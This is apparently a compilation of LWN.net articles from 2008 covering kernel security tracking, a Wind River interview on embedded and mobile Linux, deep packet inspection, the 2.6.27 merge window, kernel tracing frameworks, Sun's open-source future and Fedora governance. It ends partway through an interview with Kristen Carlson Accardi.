It is good to have a clear sense for what the security problems in a
piece of code are. If nothing else, it helps the project itself to
understand where it stands with regard to security and whether things
are getting better or worse. So it would be nice if the kernel
developers could be a bit more diligent and organized in how they
track security issues, much like the tracking of regressions has
improved over the last couple of years.  


I think the individual developers of the kernel all know quite well what
the security problems for their code are.  This is backed up by the fact
that these developers are the ones usually making the fix and telling
the -stable team that a specific patch is needed to be added.

What you seem to be asking for is a way to somehow classify bugs and
fixes in the kernel tree as "security related" or not.  And that goes
back to Linus's original point.  To try to do so marginalizes bugs which
are somehow not so designated as not worth fixing.
However, if someone wants to do this work for the kernel community,
and it proves to be useful over time, I'll be the first in line to say
that I was wrong.

		Interview: Wind River's John Bruggeman


If you wanted a symbol of Linux's impact on the world of embedded systems,
you could do worse than consider the edifying case of Wind River's
Damascene conversion.  Once one of free software's fiercest critics, today
Wind River is a cheerleader for the benefits of
open source, of sharing, and of giving back to the community. 

John
Bruggeman is Wind River's Chief Marketing Officer.  Here he talks to
Glyn Moody about why you can't use any old Linux for embedded systems, the
respective strengths and weaknesses of the Linux-based mobile platforms
from the LiMo Foundation and
Google's Android, and
what effect Nokia's announcement that it
would be open-sourcing the Symbian operating system will have on the
sector. 

Once upon a time, Wind River was synonymous with anti-Linux: what happened?

The market changed, and I think that open source
became a very, very important part of the addressable market we wanted to
reach. And if Wind River was going to be relevant and going to be important
in the marketplace, we would have to have an open source and specifically a
Linux-based solution for our customers. So, basically, the market thrust us
into it, demanded that we do it, and I think it was all for the best that
that happened.

What do you have to do to Linux to make it suitable for the embedded
market?

The embedded marketplace has requirements that aren't
in the general enterprise computing market. Things like size becomes very
critical, and memory utilization and power management and some other
features like that. Standard Linux wasn't optimized or suited for device
types that face those challenges.

Those are kind of software elements, but there is also a hardware
element. In the enterprise computing space, you are basically living in an
[Intel architecture] world and everything is pretty constant and stable and
predictable. Well, that is the anti-case with what we see in embedded. You
have a plethora of hardware environments. Each hardware environment has
their own specific nuances and special techniques and tips and trips. And
making Linux work really well with hardware is a tough problem.

How would you compare your Linux offering with your
proprietary VxWorks
solution?

VxWorks is where you need absolute real-time
determinism, where you need things like safety and security, [and to] meet
certain regulatory standards and certification standards: those kinds of
applications are the sweet spot for our VxWorks software.  More general
solutions, where application availability, middleware integration, [and]
where lots and lots of ecosystem partners are required, that's in the sweet
spot of our Linux software. 

Is there any reason why your Linux software couldn't take on the other
kinds of things as well?

I think, over time, probably not. But, that's a long
time way. A great example of that would be security certification for an
airplane. The standards and the requirements to meet those certifications
are very, very complex. They are very difficult and I think Linux is a long
way away from being able to do that. 

What's the kind of split between the VxWorks and Linux, in terms of
revenue?

Today about 80% of our revenue is VxWorks, but the
fastest-growing segment of our business is Linux. It's growing in the
triple digits quarter over quarter over quarter. We announced it well north
of $50 million for us this year.

Do you think one day you'll ever be wholly open source?

Wholly? I don't think so. There will always be
certain types of devices in which VxWorks will be a superior solution. But
the Linux portion of our business will continue to grow, and I see a day
where our Linux business is every bit as big as the VxWorks business.

What are the key attractions of Linux for your customers? 

Let me start with Linux in general. The first is
availability of the ecosystem. The need to accelerate the pace of
development is becoming critical. Many, many of our customers used to be
vertical integrators - they even manufactured their own silicon and they
would go all the way up to the top. And we're seeing a change that's
happening at light speed, where they are shifting from a vertical
integrator to an application developer.  And they are really
differentiating themselves on the user experience, on the type of
applications they develop.

The attraction of Linux is there's this massive development community
developing that infrastructure stuff that they used to spend so much time
on, that enabled application development: they don't have to do that
anymore.  The second thing is obviously cost. They really can get it at a
significantly lower development cost than they did when they used to have
to build it themselves. 

What's your business model? 

We provide things like integration testing and
validation. Open source is a bunch of packages and the magic is how well
are they put together and how reliable are they, and how well has that been
tested, and can you validate and stand behind that? We have over 300
support engineers located globally around the world, in different time
zones.  We have the richest indemnity and warranty program in the
industry. We don't stand behind Wind River, we stand behind open
source. 

Moving on to the mobile phone space, can you say a little about LiMo and
Android, and what your involvement in those has been?

Linux has the opportunity to revolutionize the mobile
phone space - not just smart phones, but feature phones, converged phones,
[Mobile Internet Devices - MIDs].  What's holding it back right now is the
fragmentation. There are just way too many different Linux distributions.
What that means is the ecosystem can't aggregate and surround anything of
any critical mass. So, two initiatives have broken out that seem to be
aggregators or consolidators: one is LiMo and one is Android. We're not
smart enough to know which one is going to be the ultimate consolidator, so
we're tremendously active in both. 

We joined LiMo as a board member and we work very, very hard with the
architectural committee to become the Linux foundation for all LiMo-based
development.  What that means is the common integration environment, which
is the Linux-built system, the tool chain, is all based on Wind River
technology. And therefore any contribution that's made to LiMo [is] based
on our technology - we contributed that common integration environment to
the LiMo foundation.

[Open Handset Alliance's Android] was announced about six or nine months or
so after LiMo, and Google came out and said Wind River is their Linux
commercialization partner. We have been working with them for about two
years. We've done a number of hardware integrations for them. That's one of
our core competences: how do you get Android running on the hardware.

We have phones coming out for both. We see a lot of activity on both and a
lot of momentum for both.

How would you contrast the two initiatives?

LiMo truly is a consortium of equals. There are
multiple operators: Vodafone, Docomo, Verizon, Orange, others. A bunch of
carriers and a bunch of handset OEMs: Motorola, Samsung, LG, Panasonic,
NEC.  And the board is made up of those guys and Wind River. And we see
that really is sort of: how do we get a common ground between fierce
competitors? How do we, for the good of the industry, standardize around
that stuff that's non-differentiating?

OHA is really a Google-driven initiative. They make product decisions and
they make feature decisions. 

So, let's talk pros and cons about this. When it's not a democracy, when
the decision-making is very clear, decisions can be made quickly and things
move very fast.  On the LiMo side, where it's a lot of people, with a lot
of experience building phones, who know what really matters, and what's
important and what works and what doesn't work, they can bring a lot of
different experience, a wealth of different perspectives together.


Sometimes it might take a little longer to make a decision over here but I
really understand and can see why that decision works over there. Where
this one races ahead, this one's a little more methodical and carefully
constructed. But they're both building compelling platforms and will both
be successful in the marketplace.

Alongside LiMo and Android, we will have an open source Symbian at some
point; what effect is that going to have on this whole market?

If you look at the smartphone market, it's 7% today
of the total phone marketplace. So, from a percentage basis, it's not
big. But what we're seeing is more and more feature phone-like capabilities
blurring with the smartphone. So even though it's a small part of the
market today, it's very strategic, because it does have implications
down-market on the feature phones.

Symbian's got 60% of the smartphone market. And Microsoft's 20 to 30% of
that market. Certainly they are not among equals, but Microsoft's been
gaining share against Symbian and against Nokia. So, I think this was an
aggressive and a bold and clever move against Microsoft.

Vis-a-vis Linux, the Symbian move just endorsed what was going on. It said
if you're going to be competitive, if you're going to relevant years from
now, you'd better have an open source model. I love that endorsement of
Linux. 

On the other hand, their solution is years away. Nokia said: Well, we'll
have it in the first half in 2010. Both Android and LiMo will have phones
out by the end of this year. So, there should be a lot of activity. Now if
I'm an ecosystem member, am I going to wait for 2010, or am I going to
develop today, and address real design opportunities and real win
opportunities today?

I think Linux has a window of opportunity. We're going to see mass adoption
of Linux-based devices, whether they are phones, or converged devices or
MIDs, or whatever they are. However this market evolves, Linux is going to
have two years' worth of product out there in the marketplace, doing stuff,
before we see Symbian open source. While Nokia made a brilliant and bold
move, it might be too late, because there is enough Linux momentum,
especially behind OHA and LiMo, that I think they left that too
long. 

What about the other player in the closed-source world, Apple with its
iPhone?

Apple will always be what Apple is. Apple is just
fantastic, touches the super, niche, high end - somebody willing to pay
$700 for a phone. And there is a big market for that - if you think a big
market is 10 million phones. That's going to be there and that's not
threatened or messed with in any of this stuff, because they are always
going to come out with some really creative form factor or killer
application: they are going to touch 10 million people.  Three years from
now we'll see a couple billion phones in the marketplace. So, let Apple go
be content with that [10 million]. Let RIM go hit their niche part of the
market. I don't see that catching fire.

So you've got the smart phones, the MIDs and now these ultraportables - the
$300-400 machines that run GNU/Linux. How do you see that three-way contest
panning out?

I think all three devices meet certain use cases. I
don't see, in the near future, or even the mid-term future, a MID
overtaking a phone. There's a reason people talk on phones, but there's
this whole different class of people in different use scenarios, they need
a MID.


What is becoming very, very clear is, it's not about voice and it's not
about text or email, it's going to be about a true, rich Internet
experience.  Can a web page be represented on these devices at the same
clarity, the same quality, the same speed, as they are on the PC? When I
look at YouTube, I don't want to look at a fuzzy, webcam image. I want to
see [High Definition] quality on that thing. So, the devices we're seeing
today, they're being required to be able to deliver that level of video
representation and audio, that's [as good as] my music device and that's as
good as my home entertainment system.


In what other embedded sectors Linux becoming important?

One of the fastest-growing areas of Linux we see
right now is in the automobile: in the in-vehicle entertainment, in the
dashboard, in the navigation.  Those, for years and years and years, have
been relegated to proprietary software stacks, because there's this big
stigma that an automobile is hard. It moves and it bumps and there's
temperature and there's all these safety requirements, and that's
proprietary stuff.


I think Apple helped change the game, because everybody wanted their iPod
in their car without a bunch of wire striking around. Automobile
manufacturers worked on the development cycle that is five to seven years,
and all of a sudden the iPod hits and they have one quarter to figure out
how to get that thing in there.


This is a whole new business and process problem that the automotive
manufacturers had not been in before. They all stood up and said: We don't
know how to do this. And then the next new application came in and the next
new application and, all of a sudden, they said: There's been a tremendous
disruption in the industry; we've got to change the underlying principles
how we design these applications.  And Linux is clearly the solution for
that, because it's all about the application and how extensible can the
platform be, and how well can we count on consumer-like speed in an
automotive-like marketplace.


The second market that I would say we're seeing in the home. Things like
broadband access points - how you get content into the house: that's going
Linux now. Every new data standard, Linux is keeping pace with that better
than anything else out there.


We're seeing a general theme here. There's a real need for content - I want
YouTube and I want cable and I want satellite and I want data. We're seeing
those three C's of content, of connectivity, and of complexity. When you
have those three things there, Linux is a tremendous solution.

Glyn Moody writes about open source at opendotdotdot.

		Deep packet inspection


At its core, the internet is a set of agreements; not just on protocols,
but also on practices amongst carriers.  Part of what has allowed the
explosive growth—in both participants and services—of the
internet can be attributed to these agreements.  When a new technology like
deep packet inspection (DPI) comes along to threaten these long-standing
practices, it should be cause for concern.


Internet packets are constructed much like postal mail.  There is an
envelope with addressing information contained in the packet header and a
message which is contained in the 
data payload portion of the packet.  Internet carriers are supposed to make
their best effort to deliver a packet based on the information in its
header. DPI violates that compact by looking inside
the data portion, as the packet is en route to its destination, and making
decisions based on that.


There are some potentially valid uses for DPI—network performance
monitoring and law enforcement surveillance, perhaps even with a warrant,
are two—but the potential for abuse is large.  Because network
processing has gotten to the point where devices can do more than just
observe and record, packets are being modified and generated on-the-fly in
a technique known as deep packet processing (DPP).


Various examples of DPI and DPP—generally lumped together as
DPI—have been in the news over the last year.  Comcast used DPI
to try and throttle
Bittorrent traffic, while Phorm and NebuAd have used
it to rewrite
web pages to deliver
advertising to unsuspecting users.  The DPI problem has gotten enough
attention that even
various governments have started showing interest.


The designer of User Datagram Protocol (UDP)—the connectionless
analog to Transmission Control Protocol (TCP)—David Reed recently
testified to the US Congress
about DPI.  In his testimony
[PDF] he outlines numerous technical issues, but the biggest may lead to
breaking the fundamental model of internet communication:

This is the real risk: [a] service or technology unnecessary to the correct
functioning of
the Internet is introduced at a place where it cannot function correctly
because it does [not]
know the endpoints' intent, yet it operates invisibly and violates rules of
behavior that
the end-users and end-point businesses depend to work in a specific way.


We have seen this behavior from internet companies in other guises
as well.  Verisign and various ISPs have tried redirecting failed DNS
queries to pages they control (and generally fill with ads).  Once again,
that breaks many applications; it functions more or less correctly for web
browsing, but other applications depend on receiving proper errors when
querying for nonexistent domains.


Because many
ISPs hold a near-monopoly on high-speed access in a particular geographical
area, they can hold their customers hostage with little concern that
competition will come along to force a change.  It is this abuse of their
monopoly position that tends to interest regulators.  In addition, most of
their customers are unlikely to notice these "enhancements", making it
easier to get away with—at least until those more technically savvy
recognize and raise the issue.


Using encrypted communications, HTTPS for web browsing for example, is one
defense against DPI.  There is some cost associated with encryption, of
course, but it
is one that is likely to be borne if internet carriers persist in these
shenanigans.  Another option might be Obfuscated TCP, which is a
technique to do backwards-compatible encryption at the packet level.
Because it doesn't require all hosts to support it at once—it is
negotiated between the endpoints when the connection is
established—it could incrementally be added into the arsenal of tools
to thwart DPI. 


DPI uses techniques that have generally been
attributed to the "cracking" community.  Things like
man-in-the-middle attacks and IP address spoofing are difficult-to-solve
security problems for many applications.  When the "legitimate" middlemen
start manipulating packets using these means for their own benefit, they
come very 
close to—or cross—the line into illegality.


This is a battle about control; our freedoms to communicate and innovate on
the internet are at stake.  A phone system that randomly inserted
advertising into calls or a postal system that kicked back letters whose
contents it 
didn't like as undeliverable would not be considered functioning systems.
The internet requires the same treatment. 


		2.6.27 merge window, part 2


As of this writing, just over 6200 changesets have been merged into the
mainline git repository since the 2.6.26 release.  Merge activity appears
to be slowing down somewhat; it appears that most of the major trees have
been pulled.  Andrew Morton has not yet started to unload the -mm tree into
the mainline, though; until that happens, the merge window can be expected
to remain open.

User-visible changes merged since last week's summary include:


 There are new drivers for
     Samsung S3C SD/MMC interfaces,
     Atmel Multimedia card interfaces,
     Ricoh Bay1Controller cards,
     S/390 QDIO controllers,
     Renesas SuperH SH7710 and SH7712 Ethernet controllers,
     Option HSDPA/HSUPA mobile network devices,
     Broadcom BCM57711 Ethernet adapters,
     Mikrotik RouterBoard 532 series boards,
     Anysee DVB-T/C USB2.0 receivers,
     Sensoray 2255 video capture devices,
     Siano SMS10xx digital television devices,
     SuperH Mobile CEU camera controllers,
     Niagara2 hardware random number generators,
     HTC Shift (X9500) touchscreens,
     iNexio serial touchscreens,
     Sahara TouchIT-213 touchscreens,
     Xilinx XPS PS/2 controllers,
     Maxim MAX7301 GPIO expanders,
     HP iLO/iLO2 management processors,
     Atheros L1E Gigabit Ethernet adapters,
     Marvell XOR DMA engines,
     Synopsys DesignWare DMA controllers, and
     Intel version 3.0 I/OAT DMA engines.

     There is also a new PCI "slot detection driver" which will attempt to
     find all PCI slots in the system and create corresponding entries in
     /sys/bus/pci/slots/. 


 Worthy of note: the "gspca" set of video drivers, long maintained 
     outside of the mainline kernel tree, has been merged.  These drivers
     support a large number of video
     devices; with their merge, most video camera devices on the market
     are supported by Linux.

 The Fujitsu laptop driver has been updated with better hotkey and 
     backlight support for more Fujitsu models.

 The UBIFS filesystem for
     flash-based storage devices has been merged.

 The multiqueue
     networking patches have been merged.

 The IA-64 architecture has gained a paravirt_ops implementation to
     support virtualization.

 The new directories found at /sys/dev/char and
     /sys/dev/block contain pointers to sysfs entries for devices
     organized by device number.


Changes visible to kernel developers include:


 The new suspend and
     hibernate infrastructure has been merged, providing a wider set of
     callbacks for power management events.  The PCI and platform bus
     interfaces have been enhanced with support for this new
     infrastructure. 

 The TTY layer continues to evolve; significant changes include the
     introduction of a new tty_port structure meant to hold
     information common to all TTY ports and a rework of the line
     discipline code.

 The mac80211 code has a new module which can simulate any number of
     IEEE 802.11 radios; it is suitable for testing mac80211 functionality
     and associated user-space tools.

 There is a new "rfkill" mechanism for unified handling of "radio off"
     switches on wireless devices.

 A number of Video4Linux2 format-related callbacks have been renamed to
     make them match the names used with the associated buffer types.
     In addition, the vidioc_enum_fmt_vbi_cap() callback has been
     deprecated and marked for removal in 2.6.28.


 The videobuf layer now has support for controllers which cannot do
     scatter/gather I/O.

 The USB "gadget" framework has been massively reworked to provide
     better support for composite devices.

 The prototype for device_create() has changed:


     Those who see a resemblance to device_create_drvdata() are
     right; all in-tree users were converted over to that interface,
     the old device_create() was removed, and
     device_create_drvdata() was renamed.  For now, a macro makes
     calls to device_create_drvdata() do the right thing, but that
     macro will probably go away before the 2.6.27 final release.

 User-space UIO drivers can now write a signed value to the
     /dev/uioX device to enable and disable interrupts.

 Debugfs (finally) has a function for removing an entire directory
     tree:


     As a result, code creating hierarchies in debugfs no longer need
     remember the dentry of every file they create.


The tail end of the 2.6.27 merge window will be covered in next week's LWN
Kernel Page.

		Tracing: no shortage of options


Three weeks ago, LWN looked at
the renewed interest in dynamic tracing, with an emphasis on
SystemTap.  Tracing is a perennial presence on end-user wishlists; it
remains a handy tool for companies like Sun Microsystems, which wish to
show that their offerings (Solaris, for example) are superior to Linux.  It
is not surprising that there 
is a lot of interest in tracing implementations for Linux; the main
surprise is that, after all this time, Linux still does not have a
top-quality answer to DTrace - though, arguably, Linux had a working tracing mechanism long
before DTrace made its appearance.

Even a casual reader of the kernel mailing list will have noticed that
there are a lot of tracing-related patches in circulation at the moment.
There are so many, in fact, that it is hard to keep track of them all.  So
this article will take a quick look at the code which has been posted in an
attempt to make the various options a bit clearer.

SystemTap

SystemTap remains the presumptive Linux tracing solution of choice.
It is hampered by a few problems, though, including usability issues, a
complete lack of static trace points in the mainline kernel, and no
user-space tracing capability.  On the
usability side, we are seeing a few more kernel developers trying to put
SystemTap to work and posting about the problems they are having.  If one
takes as a working hypothesis the notion that, if kernel hackers cannot
make SystemTap work, many other users are likely to encounter difficulties
as well, then one might conclude that addressing the reported problems
would be a priority for the SystemTap developers.

The SystemTap developers do seem to be interested in these reports, which
is a good sign.  There are other things happening in the SystemTap arena,
including the release of
version 0.7 on July 15.  This release adds a number of new
features and tapsets, and a substantial set of examples as well.
Meanwhile, Anup Shan has posted an interesting
integration of SystemTap and the fault injection framework, allowing
tapsets to control fault injection and trace the results.

James Bottomley has been playing some with the SystemTap code; one result
of that work is changes to
SystemTap's internal relocation code in an attempt to make it more
acceptable for mainline kernel inclusion.  There can be no doubt that the
out-of-tree nature of much of the SystemTap support code has made it harder
for that code to progress, so any improvement which makes it more likely
that some of this code will be merged is welcome.

Also by James is this patch
implementing a new way to put markers into the kernel.  The addition of
markers (or static tracepoints) has always been problematic in that many of
these markers, by their nature, need to go into some of the hottest code
paths in the kernel.  To support dynamic tracing, these markers need to be
available on production systems, so they must work without creating any
significant performance regressions.  Quite a bit of work has gone into the
static marker code which is in the kernel (but mostly unused) now, but some
developers are still uncomfortable with putting them into
performance-critical paths.

James's patch addresses these concerns by putting the tracepoints entirely
outside of the code paths.  Rather than add some sort of marker to the
code, these markers just make a note of just where in the code the marker
is supposed to be; this note is stored in a separate part of the kernel
binary.  That information is enough for a run-time tool to patch in an
actual jump to a tracing function should somebody want to see the
information from that tracepoint.  An additional benefit is that these
markers do not interfere with any optimizations done by the compiler.  Other
solutions can insert optimization barriers which, while they do make life
easier for the tracing subsystem, also affect the speed of the code even
when the trace points are not active.

Ftrace

The text above said that the kernel's static tracepoint
code is "mostly unused."  That would have been better expressed as
"completely," except that the 2.6.27 kernel will include a user in the form
of the ftrace framework.  One of the things which makes ftrace truly unique
is that its documentation was not only merged before the code itself, but
well before: the 2.6.26 kernel includes the excellent Documentation/ftrace.txt file.

The ftrace (which stands for "function tracer") framework is one of the
many improvements to come out of the realtime effort.  Unlike SystemTap, it
does not attempt to be a comprehensive, scriptable facility; ftrace is much
more oriented toward simplicity.  There is a set of virtual files in a
debugfs directory which can be used to enable specific tracers and see the
results.  The function tracer after which ftrace is named simply outputs
each function called in the kernel as it happens.  Other tracers look at
wakeup latency, events enabling and disabling interrupts and preemption,
task switches, etc.  As one might expect, the available information is
best suited for developers working on improving realtime response in
Linux.  The ftrace framework makes it easy to add new tracers, though, so
chances are good that other types of events will be added as developers
think of things they would like to look at.

Tracepoints

The kernel
markers mechanism is meant to be the way that static tracepoints are
inserted into the kernel.  To that end, a great deal of effort went into
making these markers fast; they are, for all practical purposes, a set of
no-op instructions until somebody wants to turn one on, at which point the
real tracing code is patched into the running kernel.  Since they were
merged, however, kernel markers have been the subject of a few grumbles.

In particular, kernel markers use a somewhat awkward mechanism to ensure
that any arguments passed to the tracing function are interpreted correctly
there.  Each marker has a printk()-style format string associated
with it; that string describes the type of each "argument" (a variable
or expression within the code being traced).  When tracing code activates a
marker, it will supply a function to be called when the marker is hit and a
format string describing the arguments that the function expects.  The
marker code will ensure that both format strings match; otherwise the
marker will not be enabled.  The problem is that the format string requires
extra work to write and is only approximate in its specification of the
types involved.  These strings can make it clear that a given argument is a
pointer, for example, but they say nothing about what type is pointed to.


In response to various efforts to get around this issue, Mathieu Desnoyers
(the original author of the kernel marker work) has proposed a new
mechanism called tracepoints.  They are another
way of putting static trace points into the kernel, but with a simpler and
more type-safe way of putting the pieces together.


With tracepoints, every trace point must be declared in a header file with
a mildly ugly set of macros:


This definition will create a new tracepoint called
tracepoint_name.  Any function attached to that tracepoint must
have a function prototype as provided in the TPPROTO() macro; the
names of the associated arguments are provided with TPARGS().

Perhaps this is better understood with an example.  The tracepoints patch
set includes quite a few static points for use with the LTTng tracing
toolkit.  There is one called sched_wakeup which fires whenever
the scheduler wakes up a process.  It is defined with:


The actual insertion of the tracepoint is a line like this:


Note the trace_ prefix added to the supplied name.  At this point
in the code, a tracing function can be called with rq (the run
queue of interest) and p (the process which is waking up) as parameters.
Until an actual function is connected to the tracepoint, though, this
declaration is essentially a no-op.  Connection of a trace function is done
through a call to:


The register_trace_sched_wakeup() function (created as part of the
DEFINE_TRACE() definition) will connect the supplied trace
function to the tracepoint.  The fact that the function prototype for the
trace function is supplied as part of the tracepoint definition means that
the compiler can perform thorough type checking; if the prototypes do not
match up, compilation will fail.  And that, in turn, should put an end to
those embarrassing situations where turning on tracing causes the system to
go down in flames.

Interestingly, tracepoints have dispensed with much of the mechanism
developed to minimize the runtime impact of kernel markers; in particular,
they do not use the "immediate values" code.  Profiling has shown that the
performance impact of tracepoints is so low that there is little value in
the added complexity of runtime patching of kernel code.  Still, there are
signs that some kernel developers will object to the addition of
tracepoints in their current form.  Developers want tracing support - but
not at the cost of slower performance, even if that cost is hard to
measure.

Tracehook

Finally, Roland McGrath recently surfaced with the tracehook patch set.  Tracehook
has a rather different focus; it is, essentially, a cleanup of the way the
kernel handles the ptrace() system call.  The tracehook patches
try to organize all of the process tracing code (much of which is
architecture-dependent) into one place where it can be dealt with as a
unit. 

Tracehook is meant to be a first step toward the merging of a new version
of the utrace code.  Utrace
has long been planned as the successor to the current ptrace()
implementation, which has few admirers.  But utrace has encountered a
number of difficulties, so its path into the kernel has been slow.  It
disappeared from the lists entirely for a while, but a new version of the
patches is said to be coming soon; Roland notes that he expects "some
vigorous feedback" when that happens.


The real importance of the ptrace() rework is that it is the path
toward integrated tracing of kernel- and user-space events.  And that, of
course, is one of the biggest features offered by DTrace which is not yet
available in SystemTap.  Getting user-space tracing into the kernel -
especially if it could work with the tracepoints already being inserted
into some applications for DTrace - would be a major step forward for
Linux.  A lot of people will be watching when this patch set comes around
again.

Meanwhile, Roland would like to see the tracehook code merged for 2.6.27.
He is late to the party, though, and this code has not done any time in
linux-next.  So it is not yet clear whether tracehook will go in before the
merge window closes, or whether, instead, it will have to wait for 2.6.28. 


In summary...

As can be seen, there is a lot happening in the area of tracing support for
Linux.  Tracing, it seems, is an idea whose time has come, at last.  If the
pieces described here can be merged and integrated into a unified
framework, and if it can all be made sufficiently easy to use, the time for
"DTrace envy" will come to an end.  Those "ifs" are not small ones,
though.  There is quite a bit of work to be done yet; hopefully the current
level of energy will remain until the job is done.

		Anticipating the sunset


In his two years at the top of Sun Microsystems, Jonathan Schwartz has
embraced a number of ambitious changes.  While one need not look too far to
find complaints about how Sun works with the free software community, there
can be no doubt that Mr. Schwartz has made the company far more open than
it was in the past.  Free software is an important part of Sun's overall
strategy; this can be seen in the company's claims to have contributed more
code to the community than any other source.

Unfortunately, Mr. Schwartz's time at Sun has been accompanied by a 50%
decline in Sun's stock price.  Whether he could possibly have done any
better given the state of the company when he took over and state of the
economy now is something one could debate, but we'll not do that
here.  More interesting, from the community's point of view, is the rumors
that he could soon be looking for a new job.


It has often been said that if corporations were people, they would have
the personality of a sociopathic teenager.  Certainly companies can exhibit
no end of the sort of moody, capricious, and even self-destructive behavior
sometimes seen in adolescents - then they come back and ask for more money.
An abrupt change at Sun could well bring in 
a CEO determined to show that his predecessor's policies were fundamentally
wrong and were primarily responsible for Sun's problems.  And that could
bring some interesting changes.


Imagine a Sun which decided that it could no longer afford to share its
Valuable Intellectual Property with the world.  Perhaps Solaris,
OpenOffice, Java, etc. would be relicensed under the new, Sun Proprietary
Overtly Indecent License (SPOIL), with no more free releases.  Hungry
lawyers could start prowling for cases where Solaris code has been mixed
into projects with incompatible licenses.  StarOffice might go OOXML-only.
MySQL could shift to a new, undocumented on-disk format with users' data
subject to Sun-controlled DRM on every table.  The new Java license would
forbid the publication of not just benchmark results, but also of criticism
of features of the language.


Clearly, some of these scenarios are rather far afield - though they are
fun to make up.  But, if we have
learned anything from the SCO story, it must be that a company which
presents itself as a solid part of the community can, in short order, turn
around and go against us.  Even if Sun does not degenerate to the point of
starting legal attacks against free software, it could certainly put an end
to the many contributions that it is making now.


Whenever one deals in company-owned free software, one should consider what
happens if that company goes away.  Projects with distributed copyright
ownership are mostly immune to this kind of problem; there is no single
company which could create huge problems for the Linux kernel by
withdrawing its participation, for example.  (Along these lines, it's worth
noting that Evolution recently stopped
requiring copyright assignments from its developers).  But, in
situations where a single company owns the copyrights and dominates
development, a change of heart could make a real difference to downstream
users.  It all depends on what sort of community has developed around the
code.


If future versions of Solaris were to be proprietary-only, the current
releases would still be out there.  But the Solaris development community
outside of Sun is tiny, so chances are good that such a move would kill
OpenSolaris as a free software project - to the extent that it is one now.
Anybody wishing to continue to use Solaris would probably have to move to
the proprietary version.  OpenOffice.org would likely survive, though the
external development community - never encouraged that much by Sun - would
have to organize itself and, perhaps, choose a new name.  Java is entirely
subject to Sun's policies regarding conformance tests and such; it could
easily revert to its status from a few years ago.  And so on.  The point is
that a change of heart at Sun could easily make us appreciate the company's
relatively friendly attitude now, and could create difficulties for
distributors and users of Sun-sponsored projects.


There are plenty of other single-owner projects out there, of course.  Many
of them are entirely dependent on the continued good will (and viability)
of their sponsoring companies.  Others are less so.  Copyrights on code
released by the GNU project are generally owned by the Free Software
Foundation.  But, if Richard Stallman were to hit his head in an
unfortunate contra dancing accident and decide that, henceforth, FSF-owned
code would only be released under the binary-only GPLv4, those projects
would not suffer much.  Instead, the development community behind that code
- strongly influenced but not controlled by the FSF - would quickly move to
a new home and continue its work.  For a practical example, see the
creation of X.org in the wake of the relicensing of XFree86.


With any luck at all, the silly scenarios outlined above will not come to
pass.  But there is value in pondering how things could go.  Such thought
quickly leads to the conclusion that a vibrant development community is not
just good because it leads to faster progress and more cool features.  That
community is the source for the long-term support for the code, support
which is not subject to one company's quarterly results.

		Notes from the Fedora project


The Fedora folks have a lot of important problems on their mind.  As part
of that, there is currently a tense
election underway - to choose the codename for the Fedora 10
release.  There's a list of nine suitably silly, Red-Hat-legal-approved
names to choose from.  Your editor, fresh from another failed Rawhide
update, suggests voting for "terror."  Even though Rawhide hasn't been
that terrible recently.


Another election - this one for the membership of the Fedora Engineering
Steering Committee (FESCO), just finished.
FESCO members this time around will be Bill Nottingham, Kevin Fenzi, Dennis
Gilmore, Brian Pepple, David Woodhouse, Jarod Wilson, Josh Boyer, Jon
Stanley and Karsten Hopp.  For the curious, the FESCO
mission is:


	FESCo handles the process of accepting new features, the acceptance
	of new packaging sponsors, Special Interest Groups (SIGs) and SIG
	Oversight, the packaging process, handling and enforcement of
	maintainer issues and other technical matters related to the
	distribution and its construction.


The new feature aspect of the job could be interesting in the near future;
there has been some clear confusion on what constitutes a new feature, as
compared to a mere "enhancement" which does not involve FESCO.  The
surprising (to some) replacement of RPM in Rawhide was one of those
ambiguous issues which brought this question to the fore.  There is now an
enhanced draft
feature policy up for review which, it is hoped, will clarify the
situation. 


Back in June, the results from the Fedora board election raised some concerns about the
process.  One reaction to these concerns can now be seen in this
proposal for term limits for board members.  The reasoning behind this
proposal is explained thusly by project
leader Paul Frields:


	The problem at hand was the perceived dominance by full-time Fedora
	people on the Board.  People who spend their entire $DAYJOB as well
	as their spare time on Fedora are automatically very involved and
	visible.  That can translate directly to votes on the basis of name
	recognition, which really disadvantages people who are very
	involved, but in a somewhat more limited fashion because they don't
	have the luxury of doing Fedora all day every day.


So the full-time Fedora folks are simply too prominent, to the point that
they need to be eased off the stage after a couple of terms on the board to
make room for everybody else.  Of course, there's a couple of exceptions.
The Fedora project leader, not being an elected member of the board, has no
such limits.  More to the point, though: term limits would not apply to
those board members appointed by Red Hat.  The reasoning here is:


	Extending these term limits to Red Hat appointed seats is not
	sensible for a number of reasons -- institutional knowledge,
	flexibility, etc.


As of this writing, there has not been a whole lot of discussion of the
term limit proposal; opinions which have been posted are not entirely
positive.  Fedora project members will want to consider whether this
proposal can achieve its stated goal.  It would be unfortunate if an
up-and-coming outsider - with associated institutional memory - got
term-limited off the board just as they were really hitting their stride. 


Finally, OLPC enthusiasts may want to have a look at the newly-formed OLPC special interest group.  This group is
working to make the Fedora distribution (already shipped by OLPC) as well
suited to that platform as possible.  One of the results should include a
special Sugar "spin" of Fedora.  There is a mailing list available for
interested people to join.

		Interview: Kristen Carlson Accardi


Kristen Carlson Accardi is a Linux kernel developer for Intel's Open
Source Technology Group.  She is the maintainer for the PCIE hot-plug
driver, the SHPC hot-plug driver, and the PCI hot-plug subsystem
in the Linux kernel.  She is currently working on SATA
drivers, including implementing power management features.

Kristen is the benevolent dictator for the upcoming Linux Plumbers
Conference.  We interviewed her about LPC, why so many Linux
developers live near Portland, Oregon, and life as a kernel developer.


What is Linux Plumbers Conf?
And why the "Plumbers" part? 


Linux Plumbers Conference is a conference for developers working on
the low level programming of Linux, including kernel, libraries, and
system applications such as udev, hal, and dbus.  We came up with the
name "Plumbers" because we wanted to represent these areas as basic
system infrastructure which has many connections.  Plus these programs
are sort of the nasty, grimy, unglamorous underbelly of the system -
not unlike the pipes in your house.  Essential - but nobody wants to
know they are there and everyone takes them for granted until they
don't work.


Running a conference is a lot of work in addition to your full time
job as a Linux kernel developer.  What made you decide to start Linux
Plumbers Conf?


Actually, it was the idea of a group of people.  The Portland Linux
kernel community gets together once a month or so to socialize and
drink beer.  At one of these gatherings we had a conversation about
how difficult it was to solve big picture problems that cross multiple
project boundaries.  We felt that there are some cases where you
really need to be able to just get everyone in a room and be able hash
things out in person, but there wasn't really a forum for this.
Existing conferences were either too narrow (like Kernel Summit or the
X developers summit) or too broad for our purposes.  

Then someone said
something like "Hey, why don't we just make our own conference".
Because we are nothing more than a group of developers with a shared
love of beer, we went to the Linux Foundation and asked them to
collaborate with us, and it's been a wonderful partnership.  It's
